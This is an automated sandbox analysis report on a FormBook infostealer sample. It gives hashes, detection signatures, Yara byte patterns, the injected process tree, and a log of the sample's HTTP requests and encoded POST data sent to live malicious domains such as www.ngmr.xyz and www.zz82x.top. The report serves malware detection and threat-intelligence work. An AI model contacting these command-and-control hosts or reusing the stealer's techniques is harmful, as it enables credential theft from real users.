Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
s7Okni1gfE.exe

Overview

General Information

Sample name:s7Okni1gfE.exe
renamed because original name is a hash value
Original sample name:fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89.exe
Analysis ID:1569366
MD5:19730719a742ee889c6bd0b9e635d234
SHA1:bdf8492135d88c88050319d017cbb49779f81f59
SHA256:fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • s7Okni1gfE.exe (PID: 5864 cmdline: "C:\Users\user\Desktop\s7Okni1gfE.exe" MD5: 19730719A742EE889C6BD0B9E635D234)
    • svchost.exe (PID: 636 cmdline: "C:\Users\user\Desktop\s7Okni1gfE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WNGaDiurNI.exe (PID: 5316 cmdline: "C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 5124 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • WNGaDiurNI.exe (PID: 3164 cmdline: "C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x449f6:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x2cb75:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13cdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e033:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x161b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ee33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16fb2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ParentImage: C:\Users\user\Desktop\s7Okni1gfE.exe, ParentProcessId: 5864, ParentProcessName: s7Okni1gfE.exe, ProcessCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ProcessId: 636, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ParentImage: C:\Users\user\Desktop\s7Okni1gfE.exe, ParentProcessId: 5864, ParentProcessName: s7Okni1gfE.exe, ProcessCommandLine: "C:\Users\user\Desktop\s7Okni1gfE.exe", ProcessId: 636, ProcessName: svchost.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.ngmr.xyz/qj8y/Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8Avira URL Cloud: Label: malware
            Source: http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ==Avira URL Cloud: Label: malware
            Source: http://www.ngmr.xyzAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: s7Okni1gfE.exeReversingLabs: Detection: 73%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: s7Okni1gfE.exeJoe Sandbox ML: detected
            Source: s7Okni1gfE.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WNGaDiurNI.exe, 00000006.00000000.1885629336.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, WNGaDiurNI.exe, 00000008.00000002.2714957354.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00846CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00846CA9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_008460DD
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_008463F9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0084EB60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0084F5FA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084F56F FindFirstFileW,FindClose,0_2_0084F56F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00851B2F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00851C8A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00851F94

            Networking

            barindex
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.ngmr.xyz
            Source: Joe Sandbox ViewIP Address: 38.47.232.196 38.47.232.196
            Source: Joe Sandbox ViewIP Address: 54.67.87.110 54.67.87.110
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00854EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00854EB5
            Source: global trafficHTTP traffic detected: GET /r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== HTTP/1.1Host: www.healthyloveforall.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 HTTP/1.1Host: www.ophthalmo.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 HTTP/1.1Host: www.ngmr.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.bonusgame2024.online
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.ophthalmo.cloud
            Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
            Source: unknownHTTP traffic detected: POST /fk06/ HTTP/1.1Host: www.zz82x.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.zz82x.topConnection: closeContent-Length: 208Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.zz82x.top/fk06/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Data Raw: 44 54 73 34 43 44 34 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d Data Ascii: DTs4CD4=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:22:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Dec 2024 17:22:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
